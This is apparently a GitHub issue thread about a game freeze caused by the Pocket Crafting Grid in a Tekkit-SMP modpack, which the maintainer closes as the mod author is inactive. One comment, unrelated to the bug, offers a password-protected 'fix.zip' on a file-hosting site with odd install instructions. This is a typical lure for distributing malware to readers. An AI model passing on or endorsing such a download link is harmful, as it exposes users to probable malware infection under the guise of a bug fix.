### ISSUE TITLE
Pocket Crafting Grid freezing game

### ISSUE THREAD

**Issue by CyberGaming424** [xJon/Tekkit-SMP#6]
### Was this bug reported before?

- [X] No, it was not.

### Please describe the issue you are experiencing

When shift clicking items in inventory while the pocket crafting grid is open the game will freeze indefinitely.

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by xJon** [comment]
Closing this as the mod author is inactive, unfortunately.
